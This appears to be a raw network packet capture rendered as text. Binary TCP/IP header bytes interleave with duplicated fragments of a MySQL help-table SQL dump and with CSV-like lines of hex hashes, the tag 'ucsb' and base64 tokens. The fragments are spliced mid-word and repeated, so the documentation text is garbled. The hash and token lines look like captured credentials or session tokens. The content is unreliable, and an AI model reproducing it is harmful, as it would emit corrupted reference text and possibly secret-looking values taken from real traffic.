23:50:26\'\nmysql> SELECT NOW() + 0;\n -> 19971215235026',''),(223,'>=',26,' >=\nGreater than or equal:\n','mysql> SELECT 2 >= 2;\n -> 1',''),(224,'EXP',4,' EXP(X)\nReturns the value of e (the base of natural logarithms) raised to\nthe power of X.\n','mysql> SELECT EXP(2);\n -> 7.389056\nmysql> SELECT EXP(-2);\n -> 0.135335',''),(225,'SHA',17,' SHA1(str)\n SHA(str)\nCalculates an SHA1 160-bit checksum for the string, as described in\nRFC 3174 (Secure Hash Algorithm). The value is returned as a string of 40 hex\ndigits, or NULL if the argument was NULL.\nOne of the possible uses for this function is as a hash key. You can\nalso use it asCObbBi0`ET@/أ  o0E<@?|  PPZ脀  ^bsoundex string from str. Two strings that sound almost the\nsame should have identical soundex strings. A standard soundex string\nis four characters long, but the SOUNDEX() function returns an\narbitrarily long string. You can use SUBSTRING() on the result to get\na standard soundex string. All non-alphabetic characters are ignored in the\ngiven string. All international alphabetic characters outside the A-Z range\nare treated as vowels.\n','mysql> SELECT SOUNDEX(\'Hello\');\n -> \'H400\'\nmysql> SELECT SOUNDEX(\'Quadratically\');\n -> \'Q36324\'',''),(236,'SHOW MASTER LOGS',6,'SHOW MASTER LOGS\nSHOW BINARY LOGS\n\nLists the binary log files on the server. This statement is used as part of\nthe procedure described in [PURGE MASTER LOGS, , PURGE MASTER LOGS]\nfor determining which logs can be purged.\n\nmysql> SHOW BINARY LOGS;\n+---------------+-----------+\n| Log_name | File_size |\n+---------------+-----------+\n| binlog.000015 | 724935 |\n| binlog.000016 | 733481 |\n+---------------+-----------+\n','',''),(237,'MBRTOUCHES',8,' MBRTouches(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 touch.\n','',''),(238,'INSERT SELECT',6,'INSERT [LOW_PRIORITY | HIGH_PRIORITY] [IGNORECObb0`BiET@/o0AE<@@{  PPZ脀  ^bsoundex string from str. Two strings that sound almost the\nsame should have identical soundex strings. A standard soundex string\nis four characters long, but the SOUNDEX() function returns an\narbitrarily long string. You can use SUBSTRING() on the result to get\na standard soundex string. All non-alphabetic characters are ignored in the\ngiven string. All international alphabetic characters outside the A-Z range\nare treated as vowels.\n','mysql> SELECT SOUNDEX(\'Hello\');\n -> \'H400\'\nmysql> SELECT SOUNDEX(\'Quadratically\');\n -> \'Q36324\'',''),(236,'SHOW MASTER LOGS',6,'SHOW MASTER LOGS\nSHOW BINARY LOGS\n\nLists the binary log files on the server. This statement is used as part of\nthe procedure described in [PURGE MASTER LOGS, , PURGE MASTER LOGS]\nfor determining which logs can be purged.\n\nmysql> SHOW BINARY LOGS;\n+---------------+-----------+\n| Log_name | File_size |\n+---------------+-----------+\n| binlog.000015 | 724935 |\n| binlog.000016 | 733481 |\n+---------------+-----------+\n','',''),(237,'MBRTOUCHES',8,' MBRTouches(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 touch.\n','',''),(238,'INSERT SELECT',6,'INSERT [LOW_PRIORITY | HIGH_PRIORITY] [IGNORECLPbbBi0`ET@/Klo0EB256F922B56337191EA902A2A984BC83,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
9503D887D7BCFF0687E22F94DE835CBB,ucsb,MTNzEwEDABPeowHYneoVdC40viYC0ymYuC1KQw==
F9D2DADFEEC8EBE0C42001D6A3D1EF19,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
4861AB4480460280306E827244C67CE2,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
C8BB8D11F2E6BCF0FB8FAB6A220D3ADC,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
9453006D75C615A99EBC5CC04E26758E,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
B53725F9F884CBEE7D14F0BE73DCC55E,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
368F06655B66AF9DB66DC274ACBFB2E1,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
43CA2ADC7035F3AA71ED59D935FB51FE,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
1F54ED7EFE5CB578AAA18DC418B0F94D,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
E7061704A832C57BDC5562F29E87F7F9,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
02BE51661CAA99083AAB2E832E6304A9,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
DA02D889F0128C698EB10B94D77CFEFF,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
D84A0CF5666E83BC1E198ACDB50C9E09,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
3DC76FC7883B7160D144F0B8F336B30E,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
1CC59D2ADB41D5567925D512309743D6ChPbb0`BiET@/o0AEB256F922B56337191EA902A2A984BC83,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
9503D887D7BCFF0687E22F94DE835CBB,ucsb,MTNzEwEDABPeowHYneoVdC40viYC0ymYuC1KQw==
F9D2DADFEEC8EBE0C42001D6A3D1EF19,ucsb,MTNzEwEDAAEnT0rQFDuIIftlNS+HwnGnxrOuWg==
4861AB4480460280306E827244C67CE2,ucsb,MTNzEwEDAAK+JyN+p7P9L4sDteYs35TSH+nn6g==
C8BB8D11F2E6BCF0FB8FAB6A220D3ADC,ucsb,MTNzEwEDAAMbXFbFbacd5phZ6OY+KSHhhY+xtA==
9453006D75C615A99EBC5CC04E26758E,ucsb,MTNzEwEDAARdm7iwIkm3eyZ+NZZx6p349kTSmA==
B53725F9F884CBEE7D14F0BE73DCC55E,ucsb,MTNzEwEDAAUo+l42VrHl2bFbi1IHEeGVhr4/GA==
368F06655B66AF9DB66DC274ACBFB2E1,ucsb,MTNzEwEDAAaxmhmumcPflwHpPATcx9v9e+6PLg==
43CA2ADC7035F3AA71ED59D935FB51FE,ucsb,MTNzEwEDAAdjHZ2oFOT8SpFoFewaNtLY4zRt7A==
1F54ED7EFE5CB578AAA18DC418B0F94D,ucsb,MTNzEwEDAAhbMJ1oUzxvXWUh+/8L1o+8ltoIcA==
E7061704A832C57BDC5562F29E87F7F9,ucsb,MTNzEwEDAAlyMAutsUCumt+USrulzGjRt8RM1g==
02BE51661CAA99083AAB2E832E6304A9,ucsb,MTNzEwEDAApmNsUun/a1eHbI1kWLOaXfoHk/tg==
DA02D889F0128C698EB10B94D77CFEFF,ucsb,MTNzEwEDAAvmcL61eQxJ3svhdy2ePrFDcdMHKQ==
D84A0CF5666E83BC1E198ACDB50C9E09,ucsb,MTNzEwEDAAy4jppATPf7jc45JqwM29Yp1a9GzA==
3DC76FC7883B7160D144F0B8F336B30E,ucsb,MTNzEwEDAA1L8uit9Xvb4dOlo44cRJTbLUJ/RQ==
1CC59D2ADB41D5567925D512309743D6CPbbBi0`ET@/Klo0E32F09BA8D5B35A88703B5E21A02B1D82,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
4AD574B0F59CFDF6FD9F38B93084DE6E,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
C081E62A15F25F5A66E467CE3AEFF244,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
8459C90054F6D8260AF485628B90BBFB,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
20C515431E873AC4C2AE74962CD959B4,ucsb,MTNzEwEDABPeowHYneoVdC40viYC0ymYuC1KQw==
0C0036C4D7ECBFDD71BB99D0CDD4D01E,ucsb,MTNzEwEDABQpgjXdi6S1LwGlqueBO5dUU7EWAw==
73354AA9B12CC56EB1F01710BE10BEE7,ucsb,MTNzEwEDABUX3HIi8vPAXONFA1XOTp1cuKIuuQ==
076079FCEA7125C892272A65638E2EEF,ucsb,MTNzEwwDAAEYQrAzRqMaDFzToMZmD5Z88ROm3w==
1B9E71A1D2C4A12C8462441C5E69E349,ucsb,MTNzEwwDAAIB9BWyiBrNoNJSGNeGs9y0IlqjaA==
C554C160F218499A7FDB939F60E7BD2C,ucsb,MTNzEwwDAANGAj0oGKEA1d/3zZgqsfOPBtgOQw==
4FB4512A2FBC25769A34682409E959F1,ucsb,MTNzEwwDAARyGOg/xCpLKjv8ucFrXuUaRVjX5g==
DE0C7ABAF006997355CF68226A7DC927,ucsb,MTNzEwwDAAUkc5tASOEx3wADqwzMVEq4lPp8KA==
2A02DEB193D5E4A5646D32A1E24DF18A,ucsb,MTNzEwwDAAayPSSKFcCD76q1UzggVnWz+rTeZQ==
ACB5CEC23816DDE51B4B1EE5A47D5514,ucsb,MTNzEwwDAAdhJsOdAyEQmfdb7ZIOabC3HWKj+g==
AE94F0E395CBAB1610860C85573D1991,ucsb,MTNzEwwDAAjfZkiUEBjd/tjisvH0dK6bkDeasCPbb0`BiET@/o0AE32F09BA8D5B35A88703B5E21A02B1D82,ucsb,MTNzEwEDAA/jkbFfvMTP199BzFFT6YT+myuRqQ==
4AD574B0F59CFDF6FD9F38B93084DE6E,ucsb,MTNzEwEDABD9PWtfplxxkW/fFW0k9LyLt+cttA==
C081E62A15F25F5A66E467CE3AEFF244,ucsb,MTNzEwEDABFdmsfHjx/tpgh4pZ5M3cLXFuq3nw==
8459C90054F6D8260AF485628B90BBFB,ucsb,MTNzEwEDABKh6HgWkMf4f6LWSmdyn0lYH3d8gw==
20C515431E873AC4C2AE74962CD959B4,ucsb,MTNzEwEDABPeowHYneoVdC40viYC0ymYuC1KQw==
0C0036C4D7ECBFDD71BB99D0CDD4D01E,ucsb,MTNzEwEDABQpgjXdi6S1LwGlqueBO5dUU7EWAw==
73354AA9B12CC56EB1F01710BE10BEE7,ucsb,MTNzEwEDABUX3HIi8vPAXONFA1XOTp1cuKIuuQ==
076079FCEA7125C892272A65638E2EEF,ucsb,MTNzEwwDAAEYQrAzRqMaDFzToMZmD5Z88ROm3w==
1B9E71A1D2C4A12C8462441C5E69E349,ucsb,MTNzEwwDAAIB9BWyiBrNoNJSGNeGs9y0IlqjaA==
C554C160F218499A7FDB939F60E7BD2C,ucsb,MTNzEwwDAANGAj0oGKEA1d/3zZgqsfOPBtgOQw==
4FB4512A2FBC25769A34682409E959F1,ucsb,MTNzEwwDAARyGOg/xCpLKjv8ucFrXuUaRVjX5g==
DE0C7ABAF006997355CF68226A7DC927,ucsb,MTNzEwwDAAUkc5tASOEx3wADqwzMVEq4lPp8KA==
2A02DEB193D5E4A5646D32A1E24DF18A,ucsb,MTNzEwwDAAayPSSKFcCD76q1UzggVnWz+rTeZQ==
ACB5CEC23816DDE51B4B1EE5A47D5514,ucsb,MTNzEwwDAAdhJsOdAyEQmfdb7ZIOabC3HWKj+g==
AE94F0E395CBAB1610860C85573D1991,ucsb,MTNzEwwDAAjfZkiUEBjd/tjisvH0dK6bkDeasCSbbBi0`ET@/p܂Ao0E<6@?  3Ps X (tr2,...)\nReturns the string that results from concatenating the arguments. Returns\nNULL if any argument is NULL. May have one or more arguments.\nIf all arguments are non-binary strings, the result is a non-binary string.\nIf the arguments include any binary strings, the result is a binary string.\nA numeric argument is converted to its equivalent binary string form.\n','mysql> SELECT CONCAT(\'My\', \'S\', \'QL\');\n -> \'MySQL\'\nmysql> SELECT CONCAT(\'My\', NULL, \'QL\');\n -> NULL\nmysql> SELECT CONCAT(14.3);\n -> \'14.3\'',''),(10,'GEOMETRY HIERARCHY',24,'Geometry is the base class. It\'s an abstract class.\nThe instantiable subclasses of Geometry are restricted to zero-, one-,\nand two-dimensional geometric objects that exist in\ntwo-dimensional coordinate space. All instantiable geometry classes are\ndefined so that valid instances of a geometry class are topologically closed\n(that is, all defined geometries include their boundary).\n\nThe base Geometry class has subclasses for Point,\nCurve, Surface, and GeometryCollection:\n\n\n --- Point represents zero-dimensional objects.\n\n --- Curve represents one-dimensional objects, and has subclass\nLineString, with sub-subclasses Line and LinearRing.\n\n --- Surface is designed for two-dimenCSbb0`BiET@/Ԁo0SE<6@@  3Ps X (tr2,...)\nReturns the string that results from concatenating the arguments. Returns\nNULL if any argument is NULL. May have one or more arguments.\nIf all arguments are non-binary strings, the result is a non-binary string.\nIf the arguments include any binary strings, the result is a binary string.\nA numeric argument is converted to its equivalent binary string form.\n','mysql> SELECT CONCAT(\'My\', \'S\', \'QL\');\n -> \'MySQL\'\nmysql> SELECT CONCAT(\'My\', NULL, \'QL\');\n -> NULL\nmysql> SELECT CONCAT(14.3);\n -> \'14.3\'',''),(10,'GEOMETRY HIERARCHY',24,'Geometry is the base class. It\'s an abstract class.\nThe instantiable subclasses of Geometry are restricted to zero-, one-,\nand two-dimensional geometric objects that exist in\ntwo-dimensional coordinate space. All instantiable geometry classes are\ndefined so that valid instances of a geometry class are topologically closed\n(that is, all defined geometries include their boundary).\n\nThe base Geometry class has subclasses for Point,\nCurve, Surface, and GeometryCollection:\n\n\n --- Point represents zero-dimensional objects.\n\n --- Curve represents one-dimensional objects, and has subclass\nLineString, with sub-subclasses Line and LinearRing.\n\n --- Surface is designed for two-dimenCXbbBi0`ET@/p܂Ao0E<6@?  3P{ 1 (sional objects and\nhas subclass Polygon.\n\n --- GeometryCollection\nhas specialized zero-, one-, and two-dimensional collection classes named\nMultiPoint, MultiLineString, and MultiPolygon\nfor modeling geometries corresponding to collections of\nPoints, LineStrings, and Polygons, respectively.\nMultiCurve and MultiSurface are introduced as abstract superclasses\nthat generalize the collection interfaces to handle Curves and Surfaces.\n\n\nGeometry, Curve, Surface, MultiCurve,\nand MultiSurface are defined as non-instantiable classes.\nThey define a common set of methods for their subclasses and\nare included for extensibility.\n\nPoint, LineString, Polygon, GeometryCollection,\nMultiPoint, MultiLineString, and\nMultiPolygon are instantiable classes.\n','',''),(11,'CHAR FUNCTION',23,' CHAR(N,...)\nCHAR() interprets the arguments as integers and returns a string\nconsisting of the characters given by the code values of those\nintegers. NULL values are skipped.\n','mysql> SELECT CHAR(77,121,83,81,\'76\');\n -> \'MySQL\'\nmysql> SELECT CHAR(77,77.3,\'77.3\');\n -> \'MMM\'',''),(12,'DATETIME',1,'A date and time combination. The supported range is \'1000-01-01\n00:00:00\' to \'9999-12-31 23:59:59\'. MySQL displays\nDATETIME values in \'YYYY-MM-DD HH:MM:CXbb0`BiET@/Ԁo0SE<6@@  3P{ 1 (sional objects and\nhas subclass Polygon.\n\n --- GeometryCollection\nhas specialized zero-, one-, and two-dimensional collection classes named\nMultiPoint, MultiLineString, and MultiPolygon\nfor modeling geometries corresponding to collections of\nPoints, LineStrings, and Polygons, respectively.\nMultiCurve and MultiSurface are introduced as abstract superclasses\nthat generalize the collection interfaces to handle Curves and Surfaces.\n\n\nGeometry, Curve, Surface, MultiCurve,\nand MultiSurface are defined as non-instantiable classes.\nThey define a common set of methods for their subclasses and\nare included for extensibility.\n\nPoint, LineString, Polygon, GeometryCollection,\nMultiPoint, MultiLineString, and\nMultiPolygon are instantiable classes.\n','',''),(11,'CHAR FUNCTION',23,' CHAR(N,...)\nCHAR() interprets the arguments as integers and returns a string\nconsisting of the characters given by the code values of those\nintegers. NULL values are skipped.\n','mysql> SELECT CHAR(77,121,83,81,\'76\');\n -> \'MySQL\'\nmysql> SELECT CHAR(77,77.3,\'77.3\');\n -> \'MMM\'',''),(12,'DATETIME',1,'A date and time combination. The supported range is \'1000-01-01\n00:00:00\' to \'9999-12-31 23:59:59\'. MySQL displays\nDATETIME values in \'YYYY-MM-DD HH:MM:C[ZZBi0`EL@/˃2o0E4C@?T  P֑%#yz"j w mcdC[ZZ0`BiEL@/o0AE4C@@T  P֑%#yz"j w mcdCw]bbBi0`ET@/p܂Ao0E<@?Ld  3PWqatڀ  ( a cryptographically safe function for storing passwords.\n','mysql> SELECT SHA1(\'abc\');\n -> \'a9993e364706816aba3e25717850c26c9cd0d89d\'',''),(226,'LONGBLOB',1,' LONGBLOB\n\nA BLOB column with a maximum length of 4,294,967,295 or\n4GB (2^32 - 1) bytes. Up to MySQL\n3.23, the client/server protocol and MyISAM tables had a limit\nof 16MB per communication packet / table row. From MySQL 4.0, the maximum\nallowed length of LONGBLOB columns depends on the\nconfigured maximum packet size in the client/server protocol and available\nmemory.\n','',''),(227,'POINTN',18,' PointN(ls,n)\nReturns the n-th point in the Linestring value ls.\nPoint numbers begin at 1.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(PointN(GeomFromText(@ls),2));\n+-------------------------------------+\n| AsText(PointN(GeomFromText(@ls),2)) |\n+-------------------------------------+\n| POINT(2 2) |\n+-------------------------------------+',''),(228,'SUM',12,' SUM([DISTINCT] expr)\nReturns the sum of expr. If the return set has no rows,\nSUM() returns NULL.\nThe DISTINCT keyword can be used as of MySQL 5.0.0 to sum only the\ndistinct values of expr.\n','',''),(229,'OCT',23,' OCT(N)\nReturns a string representation of the octal value C]bb0`BiET@/Ԁo0SE<@@Kd  3PWqatڀ  ( a cryptographically safe function for storing passwords.\n','mysql> SELECT SHA1(\'abc\');\n -> \'a9993e364706816aba3e25717850c26c9cd0d89d\'',''),(226,'LONGBLOB',1,' LONGBLOB\n\nA BLOB column with a maximum length of 4,294,967,295 or\n4GB (2^32 - 1) bytes. Up to MySQL\n3.23, the client/server protocol and MyISAM tables had a limit\nof 16MB per communication packet / table row. From MySQL 4.0, the maximum\nallowed length of LONGBLOB columns depends on the\nconfigured maximum packet size in the client/server protocol and available\nmemory.\n','',''),(227,'POINTN',18,' PointN(ls,n)\nReturns the n-th point in the Linestring value ls.\nPoint numbers begin at 1.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(PointN(GeomFromText(@ls),2));\n+-------------------------------------+\n| AsText(PointN(GeomFromText(@ls),2)) |\n+-------------------------------------+\n| POINT(2 2) |\n+-------------------------------------+',''),(228,'SUM',12,' SUM([DISTINCT] expr)\nReturns the sum of expr. If the return set has no rows,\nSUM() returns NULL.\nThe DISTINCT keyword can be used as of MySQL 5.0.0 to sum only the\ndistinct values of expr.\n','',''),(229,'OCT',23,' OCT(N)\nReturns a string representation of the octal value Ce`ZZBi0`EL@/܂Sŀo0E4\@?d 3 Pu}U-$# )Cw`ZZ0`BiEL@/go0AE4\@@d 3 Pu}U-$# )CbbbBi0`ET@/p܂Ao0E<@?Lc  3PWvitڀ `P (of N, where\nN is a longlong (BIGINT)number. This is equivalent to\nCONV(N,10,8).\nReturns NULL if N is NULL.\n','mysql> SELECT OCT(12);\n -> \'14\'',''),(230,'SYSDATE',14,' SYSDATE()\n\nSYSDATE() is a synonym for NOW().\n','',''),(231,'ASBINARY',13,' AsBinary(g)\nConverts a value in internal geometry format to its WKB representation\nand returns the binary result.\n','SELECT AsBinary(g) FROM geom;',''),(232,'MAKEDATE',14,' MAKEDATE(year,dayofyear)\n\nReturns a date, given year and day-of-year values.\ndayofyear must be greater than 0 or the result is NULL.\n','mysql> SELECT MAKEDATE(2001,31), MAKEDATE(2001,32);\n -> \'2001-01-31\', \'2001-02-01\'\nmysql> SELECT MAKEDATE(2001,365), MAKEDATE(2004,365);\n -> \'2001-12-31\', \'2004-12-30\'\nmysql> SELECT MAKEDATE(2001,0);\n -> NULL',''),(233,'BINARY OPERATOR',23,' BINARY\nThe BINARY operator casts the string following it to a binary string.\nThis is an easy way to force a column comparison to be done byte by byte\nrather than character by character. This causes the comparison to be\ncase sensitive even\nif the column isn\'t defined as BINARY or BLOB.\nBINARY also causes trailing spaces to be significant.\n','mysql> SELECT \'a\' = \'A\';\n -> 1\nmysql> SELECT BINARY \'a\' = \'A\Cbbb0`BiET@/Ԁo0SE<@@Kc  3PWvitڀ `P (of N, where\nN is a longlong (BIGINT)number. This is equivalent to\nCONV(N,10,8).\nReturns NULL if N is NULL.\n','mysql> SELECT OCT(12);\n -> \'14\'',''),(230,'SYSDATE',14,' SYSDATE()\n\nSYSDATE() is a synonym for NOW().\n','',''),(231,'ASBINARY',13,' AsBinary(g)\nConverts a value in internal geometry format to its WKB representation\nand returns the binary result.\n','SELECT AsBinary(g) FROM geom;',''),(232,'MAKEDATE',14,' MAKEDATE(year,dayofyear)\n\nReturns a date, given year and day-of-year values.\ndayofyear must be greater than 0 or the result is NULL.\n','mysql> SELECT MAKEDATE(2001,31), MAKEDATE(2001,32);\n -> \'2001-01-31\', \'2001-02-01\'\nmysql> SELECT MAKEDATE(2001,365), MAKEDATE(2004,365);\n -> \'2001-12-31\', \'2004-12-30\'\nmysql> SELECT MAKEDATE(2001,0);\n -> NULL',''),(233,'BINARY OPERATOR',23,' BINARY\nThe BINARY operator casts the string following it to a binary string.\nThis is an easy way to force a column comparison to be done byte by byte\nrather than character by character. This causes the comparison to be\ncase sensitive even\nif the column isn\'t defined as BINARY or BLOB.\nBINARY also causes trailing spaces to be significant.\n','mysql> SELECT \'a\' = \'A\';\n -> 1\nmysql> SELECT BINARY \'a\' = \'A\CLdbbBi0`ET@/أ  o0E<@?j  3PZi%  ^(==','15871650'),(476497982,'Mtgcwi',582,'MTNzEwEJAAaBPW6A2Oxsz2XOTqlvsOnMHXg2hA==','38900524'),(540249347,'YexNl8hsz',5287,'MTNzEwEJAAdyOSo3XMc1ITc9ddyFS7UTn12YBg==','38573128'),(385141534,'WrxvYG5Z',5104,'MTNzEwEJAAjGdJRTYDiMF/BBFPxz3CP+SA6MTg==','19207868'),(390937211,'0UO0MtXVD7',2098,'MTNzEwEJAAnhtsyB3wJSxnuM+ynGzlrSjkDHqw==','9053554'),(388850709,'MrlINb7oHfl',2352,'MTNzEwEJAArKsRxWWIXBUN2eFWTyNLAWBKW1zQ==','38838172'),(53725019,'eVUbCHmD',1391,'MTNzEwEJAAtYe3c1yxxc72QXnhq+X/kC4Qqhew==','18595032'),(943114180,'ngjUCmn',1028,'MTNzEwEJAAwPiXAT/JPanv0mKSxwT2BCI+P0Jg==','29267296'),(549974468,'OlghSXhMA',4082,'MTNzEwEJAA1sxgv8O57qqGPEt2ajsWM3ebT2Qg==','34449231'),(719894534,'tnyVci',3848,'MTNzEwEJAA5F1O61QQAVaDdm5XNw9OW8WF16nA==','9163038'),(506845488,'JH1U9uHM',4524,'MTNzEwEJAA/VO/37pWQ8O4ZYFQHeeYnB8ZE0QA==','20581466'),(999800040,'zuMETeSvN',906,'MTNzEwEJABDFtjAemjoL5OhClSvHAdnFiHFQ4w==','13316442'),(691394238,'4qfekn4',2748,'MTNzEwEJABFB6yQOxW9Ii0BuqNopAClTlwo2Tg==','33217203'),(486067666,'yJYWtHlyRkM',972,'MTNzEwEJAAHrzyIKgh6oEJ1MvAEQ/gfDW5expA==','13824218'),(412978255,'BL4uD26',663,'MTNzEwEJAAIKB7p6YsDyE13z0gc/oW57K5v28w==','10384372'),(449380234,'SQylukzmm',493,'MTNzEwEJAAOrvK3oqE8thOd/GHcjuvz/03RFGg==','14643663'),(157160591,'204pl5y',1250,'MTNzEwEJAASY+/cireC_dbb0`BiET@/Ԁo0SE<@@i  3PZi%  ^(==','15871650'),(476497982,'Mtgcwi',582,'MTNzEwEJAAaBPW6A2Oxsz2XOTqlvsOnMHXg2hA==','38900524'),(540249347,'YexNl8hsz',5287,'MTNzEwEJAAdyOSo3XMc1ITc9ddyFS7UTn12YBg==','38573128'),(385141534,'WrxvYG5Z',5104,'MTNzEwEJAAjGdJRTYDiMF/BBFPxz3CP+SA6MTg==','19207868'),(390937211,'0UO0MtXVD7',2098,'MTNzEwEJAAnhtsyB3wJSxnuM+ynGzlrSjkDHqw==','9053554'),(388850709,'MrlINb7oHfl',2352,'MTNzEwEJAArKsRxWWIXBUN2eFWTyNLAWBKW1zQ==','38838172'),(53725019,'eVUbCHmD',1391,'MTNzEwEJAAtYe3c1yxxc72QXnhq+X/kC4Qqhew==','18595032'),(943114180,'ngjUCmn',1028,'MTNzEwEJAAwPiXAT/JPanv0mKSxwT2BCI+P0Jg==','29267296'),(549974468,'OlghSXhMA',4082,'MTNzEwEJAA1sxgv8O57qqGPEt2ajsWM3ebT2Qg==','34449231'),(719894534,'tnyVci',3848,'MTNzEwEJAA5F1O61QQAVaDdm5XNw9OW8WF16nA==','9163038'),(506845488,'JH1U9uHM',4524,'MTNzEwEJAA/VO/37pWQ8O4ZYFQHeeYnB8ZE0QA==','20581466'),(999800040,'zuMETeSvN',906,'MTNzEwEJABDFtjAemjoL5OhClSvHAdnFiHFQ4w==','13316442'),(691394238,'4qfekn4',2748,'MTNzEwEJABFB6yQOxW9Ii0BuqNopAClTlwo2Tg==','33217203'),(486067666,'yJYWtHlyRkM',972,'MTNzEwEJAAHrzyIKgh6oEJ1MvAEQ/gfDW5expA==','13824218'),(412978255,'BL4uD26',663,'MTNzEwEJAAIKB7p6YsDyE13z0gc/oW57K5v28w==','10384372'),(449380234,'SQylukzmm',493,'MTNzEwEJAAOrvK3oqE8thOd/GHcjuvz/03RFGg==','14643663'),(157160591,'204pl5y',1250,'MTNzEwEJAASY+/cireCdbbBi0`ET@/Klo0E72EC700905058529C331C9E271023714,ucsb,MTNzEwwDAAmedAO4EWjK8rh2gqM4yE6J/9SrOg==
CF2DAC1B9F076AC700489FCF461F6FAE,ucsb,MTNzEwwDAAo0zSVKdmq2SkM4w2k2NueroaLjCg==
4768DCFD16D7F7ECDB07363FE1A31E7D,ucsb,MTNzEwwDAAsm7c8J1iBJNCDu7urjY6ffJbwb6Q==
141CB14CF8F5FC3FD000B639A703DC1C,ucsb,MTNzEwwDAAxcV02y/64aa8TLDqcAprsHUT4a9w==
627C381B7A5241F7FCA7E56C3675BF6A,ucsb,MTNzEwwDABW5Grlmae+ZaDCIJ0blTM50Ewhj+w==
83BB9B95DB06B3AE79C48D4638FF5734,ucsb,MTNzEwwDABZ5wi+pdq8zqNVzKEFL7hLrTRDIyw==
C9ED99C99619371EB90B226947A067E1,ucsb,MTNzEwwDABf/Tv2gpgsO3wjiaGqH+D069Ltb/Q==
9E9442E045A9416179DF7AEB9EF475DB,ucsb,MTNzEwwDABhoT+vkKtVg63JgVAvNaKf8Wp+hkQ==
CEF3B6A79111AB94DC57F718E3D637B3,ucsb,MTNzEwwDABmpHdDo3mStkx6MKkqeTodk2GHLTg==
34F3E58534B788B9660AC1517CA11B8D,ucsb,MTNzEwwDABqDnl+TJ7gG9NikLgF2HAeM2kyU0A==
8E241FAD93D68EC43E57BB97234883D4,ucsb,MTNzEwwDABt3ahXAkcXE8NI/D8geqvu9xcoSCQ==
E57863D088D18601DF5C0048D71FCE9A,ucsb,MTNzEwwDABy+mnJ58oxTRhGEjO5SBNlbIOIqbQ==
1C4DB21C971FEE552D94A821F1F65097,ucsb,MTNzEwwDAB2Jau7vR8YAr5R/lpwDYUhpRa78lg==
F9FA33AF76F40DE0E2156D71BE64F210,ucsb,MTNzEwwDAB5ZHwOWap3DZJ/ziqew8ByT4Vk/Mg==
CA10CA8ADE7D93B581C29785DC8C67A5,ucsb,MTNzEwwDAB8qJs9hsOf3KQVtFFNR3g1GSfCxzw==
525916AE0DC759CCF57B409AF846826D,ucCdbb0`BiET@/o0AE72EC700905058529C331C9E271023714,ucsb,MTNzEwwDAAmedAO4EWjK8rh2gqM4yE6J/9SrOg==
CF2DAC1B9F076AC700489FCF461F6FAE,ucsb,MTNzEwwDAAo0zSVKdmq2SkM4w2k2NueroaLjCg==
4768DCFD16D7F7ECDB07363FE1A31E7D,ucsb,MTNzEwwDAAsm7c8J1iBJNCDu7urjY6ffJbwb6Q==
141CB14CF8F5FC3FD000B639A703DC1C,ucsb,MTNzEwwDAAxcV02y/64aa8TLDqcAprsHUT4a9w==
627C381B7A5241F7FCA7E56C3675BF6A,ucsb,MTNzEwwDABW5Grlmae+ZaDCIJ0blTM50Ewhj+w==
83BB9B95DB06B3AE79C48D4638FF5734,ucsb,MTNzEwwDABZ5wi+pdq8zqNVzKEFL7hLrTRDIyw==
C9ED99C99619371EB90B226947A067E1,ucsb,MTNzEwwDABf/Tv2gpgsO3wjiaGqH+D069Ltb/Q==
9E9442E045A9416179DF7AEB9EF475DB,ucsb,MTNzEwwDABhoT+vkKtVg63JgVAvNaKf8Wp+hkQ==
CEF3B6A79111AB94DC57F718E3D637B3,ucsb,MTNzEwwDABmpHdDo3mStkx6MKkqeTodk2GHLTg==
34F3E58534B788B9660AC1517CA11B8D,ucsb,MTNzEwwDABqDnl+TJ7gG9NikLgF2HAeM2kyU0A==
8E241FAD93D68EC43E57BB97234883D4,ucsb,MTNzEwwDABt3ahXAkcXE8NI/D8geqvu9xcoSCQ==
E57863D088D18601DF5C0048D71FCE9A,ucsb,MTNzEwwDABy+mnJ58oxTRhGEjO5SBNlbIOIqbQ==
1C4DB21C971FEE552D94A821F1F65097,ucsb,MTNzEwwDAB2Jau7vR8YAr5R/lpwDYUhpRa78lg==
F9FA33AF76F40DE0E2156D71BE64F210,ucsb,MTNzEwwDAB5ZHwOWap3DZJ/ziqew8ByT4Vk/Mg==
CA10CA8ADE7D93B581C29785DC8C67A5,ucsb,MTNzEwwDAB8qJs9hsOf3KQVtFFNR3g1GSfCxzw==
525916AE0DC759CCF57B409AF846826D,ucCebbBi0`ET@/Klo0EA5B383F5B157646F8DAFB5E7FE067082,ucsb,MTNzEwwDACHxsB9IICgcR0ySx58C/2KcTgTL7g==
8EFC8584FBA34A869213C7C5BE906FE9,ucsb,MTNzEwwDACJxw2rB8P5+kYCGyEWTixUS2fI2BQ==
